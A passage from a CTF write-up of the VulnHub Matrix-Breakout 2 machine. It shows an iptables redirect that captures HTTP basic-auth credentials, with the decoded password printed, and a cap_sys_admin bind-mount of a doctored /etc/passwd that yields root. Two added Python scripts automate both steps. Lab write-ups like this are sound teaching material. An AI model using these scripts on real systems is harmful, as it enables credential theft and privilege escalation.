configuration for example.com\n#\n# You can move that to a different file under sites-available\/ and symlink that\n# to sites-enabled\/ to enable it.\n#\n#server {\n#       listen 80;\n#       listen [::]:80;\n#\n#       server_name example.com;\n#\n#       root \/var\/www\/example.com;\n#       index index.html;\n#\n#       location \/ {\n#               try_files $uri $uri\/ =404;\n#       }\n#}<\/code><\/pre>\n<p>The site on port 81 protects its document root with HTTP basic authentication (<code>auth_basic<\/code>), and the credential file is <code>\/var\/nginx\/html\/.htpasswd<\/code>. I could not recover the password from it by brute force. I uploaded pspy64, but it segfaulted; continuing the enumeration, I uploaded <code>linpeas.sh<\/code>, which also failed:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/var\/tmp$ .\/linpeas.sh \nLinux Privesc Checklist: https:\/\/book.hacktricks.xyz\/linux-hardening\/linux-privilege-escalation-checklist\n LEGEND:\n  RED\/YELLOW: 95% a PE vector\n  RED: You should take a look to it\n  LightCyan: Users with console\n  Blue: Users without console &amp; mounted devs\n  Green: Common things (users, groups, SUID\/SGID, mounts, .sh scripts, cronjobs) \n  LightMagenta: Your username\n\n Starting linpeas. 
Caching Writable Folders...\n.\/linpeas.sh: 292: search_for_regex: not found\n\n.\/linpeas.sh: 296: Syntax error: &quot;else&quot; unexpected\n(remote) www-data@morpheus:\/var\/tmp$ \/tmp\/lpspy64 \nSegmentation fault<\/code><\/pre>\n<p>Shell errors partway through the script like these usually mean the upload was truncated or the script is being run by the wrong interpreter; rather than debug the tooling, probe by hand. <code>ss -atlup<\/code> lists the listening sockets (SSH, port 80, port 81 and a loopback-only TCP listener on 127.0.0.1:32939), and a local request to port 81 confirms the basic-auth challenge:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/var\/tmp$ ss -atlup\nNetid         State          Recv-Q         Send-Q                 Local Address:Port                    Peer Address:Port         Process         \nudp           UNCONN         0              0                          127.0.0.1:323                          0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:bootpc                       0.0.0.0:*                            \nudp           UNCONN         0              0                              [::1]:323                             [::]:*                            \ntcp           LISTEN         0              4096                       127.0.0.1:32939                        0.0.0.0:*                            \ntcp           LISTEN         0              511                          0.0.0.0:81                           0.0.0.0:*                            \ntcp           LISTEN         0              128                          0.0.0.0:ssh                          0.0.0.0:*                            \ntcp           LISTEN         0              511                                *:http                               *:*                            \ntcp           LISTEN         0              511                             [::]:81                              [::]:*                            \ntcp           LISTEN         0              128                             [::]:ssh                             [::]:*                            \n(remote) www-data@morpheus:\/var\/tmp$ curl -is 0.0.0.0:81\nHTTP\/1.1 401 Unauthorized\nServer: nginx\/1.18.0\nDate: Mon, 08 Jul 2024 10:22:35 
GMT\nContent-Type: text\/html\nContent-Length: 179\nConnection: keep-alive\nWWW-Authenticate: Basic realm=&quot;Meeting Place&quot;\n\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;401 Authorization Required&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;401 Authorization Required&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.18.0&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>Redirecting traffic to capture the basic-auth credentials<\/h3>\n<p>So authentication really is required. I was stuck at this point; after watching the group owner&#039;s video it turned out the trick involves redirecting traffic with the firewall. The first thing to notice is that <code>www-data<\/code> can read the rule set at all, and that the <code>DOCKER<\/code> chains show a Docker bridge network on the host:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/$ iptables -L\nChain INPUT (policy ACCEPT)\ntarget     prot opt source               destination         \n\nChain FORWARD (policy DROP)\ntarget     prot opt source               destination         \nDOCKER-USER  all  --  anywhere             anywhere            \nDOCKER-ISOLATION-STAGE-1  all  --  anywhere             anywhere            \nACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED\nDOCKER     all  --  anywhere             anywhere            \nACCEPT     all  --  anywhere             anywhere            \nACCEPT     all  --  anywhere             anywhere            \n\nChain OUTPUT (policy ACCEPT)\ntarget     prot opt source               destination         \n\nChain DOCKER (1 references)\ntarget     prot opt source               destination         \n\nChain DOCKER-ISOLATION-STAGE-1 (1 references)\ntarget     prot opt source               destination         \nDOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere            \nRETURN     all  --  anywhere             anywhere            \n\nChain DOCKER-ISOLATION-STAGE-2 (1 references)\ntarget     prot opt source           
    destination         \nDROP       all  --  anywhere             anywhere            \nRETURN     all  --  anywhere             anywhere            \n\nChain DOCKER-USER (1 references)\ntarget     prot opt source               destination         \nRETURN     all  --  anywhere             anywhere  \n(remote) www-data@morpheus:\/$ ls -la \/usr\/sbin\/iptables\nlrwxrwxrwx 1 root root 26 Oct 11  2021 \/usr\/sbin\/iptables -&gt; \/etc\/alternatives\/iptables<\/code><\/pre>\n<p>The rules are not just readable: <code>www-data<\/code> can modify them as well, which an unprivileged user normally cannot do. The reason shows up in the <code>getcap<\/code> output later in this writeup: the <code>xtables-legacy-multi<\/code> and <code>xtables-nft-multi<\/code> binaries behind the <code>iptables<\/code> symlink carry <code>cap_net_admin=ep<\/code>. So instead of cracking the password, rewrite the NAT rules so that whatever talks to port 81 over the Docker bridge lands on a listener we control:<\/p>\n<pre><code class=\"language-bash\">iptables -A PREROUTING -t nat -i docker0 -p tcp --dport 81 -j DNAT --to 172.17.0.1:1234<\/code><\/pre>\n<ul>\n<li><code>iptables<\/code>: the userspace tool for managing the kernel&#039;s packet-filter and NAT rules.<\/li>\n<li><code>-A PREROUTING<\/code>: append the rule to the <code>PREROUTING<\/code> chain, which processes packets right after they arrive on the host and before the routing decision; that is the point at which destination NAT (DNAT) has to happen.<\/li>\n<li><code>-t nat<\/code>: operate on the <code>nat<\/code> table. iptables has several tables, each with its own chains and rules for a different kind of processing; <code>nat<\/code> is the one dedicated to address translation.<\/li>\n<li><code>-i docker0<\/code>: 
restrict the rule to packets received on a given interface; here only packets arriving on <code>docker0<\/code>, the default Docker bridge, which containers use to reach the host and each other.<\/li>\n<li><code>-p tcp<\/code>: match only TCP packets.<\/li>\n<li><code>--dport 81<\/code>: match only packets whose destination port is 81.<\/li>\n<li><code>-j DNAT<\/code>: the action taken on a match. <code>DNAT<\/code> (destination network address translation) rewrites the packet&#039;s destination address and\/or port.<\/li>\n<li><code>--to 172.17.0.1:1234<\/code>: 
the address and port the <code>DNAT<\/code> action rewrites the destination to: 172.17.0.1, port 1234. Put together, every TCP packet that arrives on <code>docker0<\/code> for port 81 is redirected to 172.17.0.1:1234 instead of reaching nginx.<\/li>\n<\/ul>\n<p>Now listen on port 1234 and wait. Something inside the Docker network (a Go HTTP client, judging by the User-Agent) keeps requesting <code>http:\/\/172.17.0.1:81\/<\/code> with an <code>Authorization<\/code> header, and because HTTP basic authentication is only base64 over plaintext HTTP, the redirected request hands over the credentials directly:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@morpheus:\/$ nc -lp 1234\nGET \/ HTTP\/1.1\nHost: 172.17.0.1:81\nUser-Agent: Go-http-client\/1.1\nAuthorization: Basic Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0\nAccept-Encoding: gzip\n\n(remote) www-data@morpheus:\/$ echo &#039;Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0&#039; | base64 -d\ncypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist<\/code><\/pre>\n<p>The decoded value is the username <code>cypher<\/code> and its password. Once the credentials are captured, delete the rule again (the same command with <code>-D<\/code> in place of <code>-A<\/code>) so the service on port 81 keeps working, then log in as <code>cypher<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407081853692.png\" alt=\"image-20240708183632875\" \/><\/p>\n<h3>python3-9 
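cap_sys_admin privilege escalation<\/h3>\n<p>Before the manual walkthrough, an added, scripted version of the technique this section applies by hand (example code, not the original post&#039;s REPL session): it checks that the running interpreter actually holds CAP_SYS_ADMIN, writes a copy of <code>\/etc\/passwd<\/code> with a chosen hash in root&#039;s password field, bind-mounts that copy over <code>\/etc\/passwd<\/code> with <code>mount(2)<\/code> through ctypes, checking errno instead of ignoring the return value, and verifies the result. The hash is the one generated in the walkthrough with <code>openssl passwd -1 root<\/code> (password <code>root<\/code>); the copy path <code>\/home\/cypher\/passwd<\/code> is the writeup&#039;s, and the script name is an assumption.<\/p>\n

```python
#!/usr/bin/env python3
"""Bind-mount a doctored copy of /etc/passwd over the real one with CAP_SYS_ADMIN.

Added example for the Matrix-Breakout 2 writeup, not the author's REPL
session. Run it with the interpreter that carries the capability:
    /usr/bin/python3-9 bindmount_passwd.py
"""
import ctypes
import os
import sys

MS_BIND = 0x1000          # <sys/mount.h>: bind an existing file or directory onto target
MNT_DETACH = 0x2          # umount2() flag: lazy unmount, used by undo()
CAP_SYS_ADMIN_BIT = 21    # bit index of CAP_SYS_ADMIN in the CapEff mask

# Hash produced in the walkthrough with `openssl passwd -1 root` (password: root).
ROOT_HASH = "$1$he0w6jPT$Q02kWtHF7qEchSicLlamk1"
# Where the modified copy is written; the directory must be writable by the current user.
COPY_PATH = "/home/cypher/passwd"


def has_cap_sys_admin(status_text=None):
    """True if the effective capability set contains CAP_SYS_ADMIN.

    Reads the CapEff line of /proc/self/status, or of the text passed in
    (the self-test feeds constructed status text).
    """
    if status_text is None:
        with open("/proc/self/status") as f:
            status_text = f.read()
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            caps = int(line.split()[1], 16)
            return bool((caps >> CAP_SYS_ADMIN_BIT) & 1)
    return False


def rewrite_root_entry(passwd_text, new_hash, user="root"):
    """Return passwd_text with the password field of `user` set to new_hash.

    A real hash in the second field of /etc/passwd is used directly instead of
    the 'x' shadow reference, so su/login will accept the corresponding password.
    """
    out = []
    found = False
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = new_hash
            found = True
        out.append(":".join(fields))
    if not found:
        raise ValueError("no passwd entry for " + user)
    return "\n".join(out) + "\n"


def _libc():
    libc = ctypes.CDLL("libc.so.6", use_errno=True)
    libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p,
                           ctypes.c_ulong, ctypes.c_char_p)
    libc.mount.restype = ctypes.c_int
    libc.umount2.argtypes = (ctypes.c_char_p, ctypes.c_int)
    libc.umount2.restype = ctypes.c_int
    return libc


def bind_mount(source, target):
    """mount(source, target, "none", MS_BIND, NULL); raise OSError with errno on failure."""
    if _libc().mount(source.encode(), target.encode(), b"none", MS_BIND, None) != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err), target)


def undo(target="/etc/passwd"):
    """Detach the bind mount again; the file on disk was never modified."""
    if _libc().umount2(target.encode(), MNT_DETACH) != 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err), target)


def main():
    if not has_cap_sys_admin():
        sys.exit("no CAP_SYS_ADMIN in this process; run with /usr/bin/python3-9")
    with open("/etc/passwd") as f:
        modified = rewrite_root_entry(f.read(), ROOT_HASH)
    with open(COPY_PATH, "w") as f:
        f.write(modified)
    bind_mount(COPY_PATH, "/etc/passwd")   # EPERM here means the capability is missing
    with open("/etc/passwd") as f:
        if ROOT_HASH not in f.read():
            sys.exit("mount returned 0 but /etc/passwd still shows the original entry")
    print("bind mount in place: `su -` with password 'root'; undo with umount /etc/passwd")


if __name__ == "__main__":
    main()
```

<p>The writeup&#039;s own session leaves the return value of <code>mount<\/code> unchecked; checking errno matters because <code>mount(2)<\/code> fails with EPERM from an interpreter that lacks the capability, which is the quickest way to tell a wrong interpreter from a wrong path.<\/p>\n<h3>Walkthrough: python3-9 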
cap_sys_admin privilege escalation<\/h3>\n<p>Reference: <a href=\"https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/linux-capabilities#cap_sys_admin\">https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/linux-capabilities#cap_sys_admin<\/a><\/p>\n<pre><code class=\"language-bash\">cypher@morpheus:~$ cat \/etc\/group | grep &#039;humans&#039;\nhumans:x:1002:cypher,trinity<\/code><\/pre>\n<p><code>cypher<\/code> is a member of the <code>humans<\/code> group (as is <code>trinity<\/code>), so this account can execute <code>\/usr\/bin\/python3-9<\/code>. Grab the user flag, then prepare the escalation: copy <code>\/etc\/passwd<\/code> to the home directory, generate an MD5-crypt hash for the password <code>root<\/code> with <code>openssl passwd -1<\/code>, put it into the root entry of the copy (done here with vim), and check which binaries carry file capabilities:<\/p>\n<pre><code class=\"language-bash\">cypher@morpheus:~$ cd ~\ncypher@morpheus:~$ ls -la\ntotal 24\ndrwx------ 2 cypher cypher 4096 Nov 29  2021 .\ndrwxr-xr-x 4 root   root   4096 Oct 28  2021 ..\n-rw------- 1 cypher cypher  220 Aug  4  2021 .bash_logout\n-rw------- 1 cypher cypher 3526 Aug  4  2021 .bashrc\n-rw------- 1 cypher cypher  807 Aug  4  2021 .profile\n-rw------- 1 cypher cypher   81 Oct 28  2021 FLAG.txt\ncypher@morpheus:~$ cat FLAG.txt \nYou&#039;ve clearly gained access as user Cypher.\n\nCan you find a way to get to root?\ncypher@morpheus:~$ cp \/etc\/passwd .\/\ncypher@morpheus:~$ openssl passwd -1 root\n$1$he0w6jPT$Q02kWtHF7qEchSicLlamk1\ncypher@morpheus:~$ vim .\/passwd\ncypher@morpheus:~$ cat .\/passwd | grep &#039;root&#039;\nroot:$1$he0w6jPT$Q02kWtHF7qEchSicLlamk1:0:0:root:\/root:\/bin\/bash\ncypher@morpheus:~$ cat \/etc\/passwd | grep &#039;root&#039;\nroot:x:0:0:root:\/root:\/bin\/bash\ncypher@morpheus:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/python3-9 cap_sys_admin=ep\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/sbin\/xtables-legacy-multi cap_net_admin=ep\n\/usr\/sbin\/xtables-nft-multi cap_net_admin=ep<\/code><\/pre>\n<p><code>python3-9<\/code> has <code>cap_sys_admin=ep<\/code>, and CAP_SYS_ADMIN includes the right to call <code>mount(2)<\/code>. (The same listing also explains the earlier iptables step: both xtables multi-call binaries carry <code>cap_net_admin=ep<\/code>.) So use python3-9 to bind-mount the modified copy over <code>\/etc\/passwd<\/code> through libc&#039;s <code>mount<\/code>. A hash in the password field of <code>\/etc\/passwd<\/code> is used directly instead of the <code>x<\/code> shadow reference, so <code>su<\/code> will accept the new password:<\/p>\n<pre><code class=\"language-bash\">cypher@morpheus:~$ \/usr\/bin\/python3-9\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType &quot;help&quot;, &quot;copyright&quot;, 
&quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from ctypes import *\n&gt;&gt;&gt; libc = CDLL(&quot;libc.so.6&quot;)\n&gt;&gt;&gt; libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)\n&gt;&gt;&gt; MS_BIND = 4096\n&gt;&gt;&gt; source = b&quot;\/home\/cypher\/passwd&quot;\n&gt;&gt;&gt; target = b&quot;\/etc\/passwd&quot;\n&gt;&gt;&gt; filesystemtype = b&quot;none&quot;\n&gt;&gt;&gt; options = b&quot;rw&quot;\n&gt;&gt;&gt; mountflags = MS_BIND\n&gt;&gt;&gt; libc.mount(source, target, filesystemtype, mountflags, options)\n0\n&gt;&gt;&gt; exit()\ncypher@morpheus:~$ su -\nPassword: \nroot@morpheus:~# <\/code><\/pre>\n<p><code>mount<\/code> returned 0, so the bind mount is in place and <code>\/etc\/passwd<\/code> now resolves to our copy; <code>su -<\/code> with the password <code>root<\/code> drops into a root shell. Root! The bind mount exists only in the kernel&#039;s mount table (the file on disk is untouched), so it vanishes on reboot and <code>umount \/etc\/passwd<\/code> undoes it.<\/p>\n<pre><code class=\"language-bash\">root@morpheus:~# ls -la\ntotal 48\ndrwx------  4 root root  4096 Nov 29  2021 .\ndrwxr-xr-x 19 root root  4096 Oct 28  2021 ..\n-rw-r--r--  1 root root   571 Apr 10  2021 .bashrc\n-rw-------  1 root root    79 Oct 28  2021 .lesshst\ndrwxr-xr-x  3 root root  4096 Oct 28  2021 .local\n-rw-r--r--  1 root root   161 Jul  9  2019 .profile\n-rw-r--r--  1 root root    66 Oct 28  2021 .selected_editor\ndrwxr-xr-x  2 root root  4096 Oct 28  2021 .vim\n-rw-------  1 root root 10925 Oct 28  2021 .viminfo\n-rw-------  1 root root    54 Oct 28  2021 FLAG.txt\nroot@morpheus:~# cat FLAG.txt \nYou&#039;ve won!\n\nLet&#039;s hope Matrix: Resurrections rocks!<\/code><\/pre>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/github.com\/devl00p\/blog\/blob\/c3505ecafc530b2d105564af12444878ff5a14e1\/ctf_writeups\/Solution%20du%20CTF%20Matrix-Breakout%3A%202%20Morpheus%20de%20VulnHub.md?plain=1\">https:\/\/github.com\/devl00p\/blog\/blob\/c3505ecafc530b2d105564af12444878ff5a14e1\/ctf_writeups\/Solution%20du%20CTF%20Matrix-Breakout%3A%202%20Morpheus%20de%20VulnHub.md?plain=1<\/a><\/p>\n<p><a 
href=\"https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/linux-capabilities#cap_sys_admin\">https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/linux-capabilities#cap_sys_admin<\/a><\/p>\n<p><a href=\"https:\/\/devl00p.github.io\/posts\/Solution-du-CTF-Matrix-Breakout-2-Morpheus-de-VulnHub\/\">https:\/\/devl00p.github.io\/posts\/Solution-du-CTF-Matrix-Breakout-2-Morpheus-de-VulnHub\/<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV18i421Y7La\/?spm_id_from=333.999.0.0&amp;vd_source=8981ead94b755f367ac539f6ccd37f77\">https:\/\/www.bilibili.com\/video\/BV18i421Y7La\/?spm_id_from=333.999.0.0&vd_source=8981ead94b755f367ac539f6ccd37f77<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Matrix-breakout2-morpheus \u6ce8\u610f\u6539\u9776\u673a\u9700\u8981\u91c7\u7528vmware\u8fdb\u884c\u64cd\u4f5c\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-741","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/741","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=741"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/741\/revisions"}],"predecessor-version":[{"id":742,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\
/posts\/741\/revisions\/742"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=741"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=741"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=741"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
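Appendix to the "Redirecting traffic to capture the basic-auth credentials" section of the writeup above: an added Python script (not part of the original post) that automates what the writeup does with iptables, nc and base64 -d. It installs the DNAT rule, accepts one redirected connection, answers it with the same 401 the real server would send so the polling client does not notice, extracts and decodes the Authorization header, and removes the rule again. The interface, ports and address are the writeup's; the sample request used for the self-check is the one the writeup captured with nc. Run it as www-data on the box; anywhere else only the parsing functions are exercised.

```python
#!/usr/bin/env python3
"""Redirect a Docker client's HTTP request to us and read its basic-auth header.

Added example for the Matrix-Breakout 2 writeup, not the author's own
commands. Needs the cap_net_admin-bearing iptables from the box to install
the rule; parse_basic_auth() and dnat_rule() work anywhere.
"""
import base64
import socket
import subprocess

IFACE = "docker0"          # bridge the polling container talks to the host over
SERVICE_PORT = 81          # the basic-auth protected nginx vhost
LISTEN_PORT = 1234         # our listener
REDIRECT_TO = "172.17.0.1" # host address on the bridge

# Request the writeup captured with `nc -lp 1234` (CRLF line endings added).
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 172.17.0.1:81\r\n"
    b"User-Agent: Go-http-client/1.1\r\n"
    b"Authorization: Basic Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0\r\n"
    b"Accept-Encoding: gzip\r\n"
    b"\r\n"
)


def dnat_rule(action="-A"):
    """argv for adding (-A) or deleting (-D) the writeup's redirect rule.

    --to-destination is the full name of the DNAT option the writeup
    abbreviates as --to.
    """
    return ["iptables", "-t", "nat", action, "PREROUTING", "-i", IFACE,
            "-p", "tcp", "--dport", str(SERVICE_PORT),
            "-j", "DNAT", "--to-destination", f"{REDIRECT_TO}:{LISTEN_PORT}"]


def parse_basic_auth(raw_request):
    """Return (user, password) from a raw HTTP request, or None.

    Basic auth is base64(user:password) on the wire, so anyone who can read
    or, as here, redirect the request gets the cleartext credentials.
    """
    text = raw_request.replace(b"\r\n", b"\n")
    head = text.split(b"\n\n", 1)[0]
    for line in head.split(b"\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() != b"authorization":
            continue
        scheme, _, token = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            return None
        try:
            decoded = base64.b64decode(token.strip(), validate=True)
        except ValueError:                      # binascii.Error is a ValueError
            return None
        user, _, password = decoded.partition(b":")
        return user.decode("utf-8", "replace"), password.decode("utf-8", "replace")
    return None


def read_request(conn, limit=65536):
    """Read until the end of the header block, EOF, or the size limit."""
    buf = b""
    while b"\r\n\r\n" not in buf and len(buf) < limit:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def capture_once(bind_addr="0.0.0.0", port=LISTEN_PORT, timeout=None):
    """Accept one redirected connection, answer like nginx would, return creds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, _ = srv.accept()
        with conn:
            creds = parse_basic_auth(read_request(conn))
            conn.sendall(b"HTTP/1.1 401 Unauthorized\r\n"
                         b'WWW-Authenticate: Basic realm="Meeting Place"\r\n'
                         b"Content-Length: 0\r\nConnection: close\r\n\r\n")
    return creds


def main():
    subprocess.run(dnat_rule("-A"), check=True)
    try:
        print(capture_once())
    finally:
        # leave the firewall as we found it so port 81 keeps working
        subprocess.run(dnat_rule("-D"), check=True)


if __name__ == "__main__":
    main()
```

Answering with a 401 rather than just closing the socket keeps the redirected client's behaviour identical to what it sees from nginx, and the rule is removed in a finally block so a crash in the listener does not leave port 81 broken.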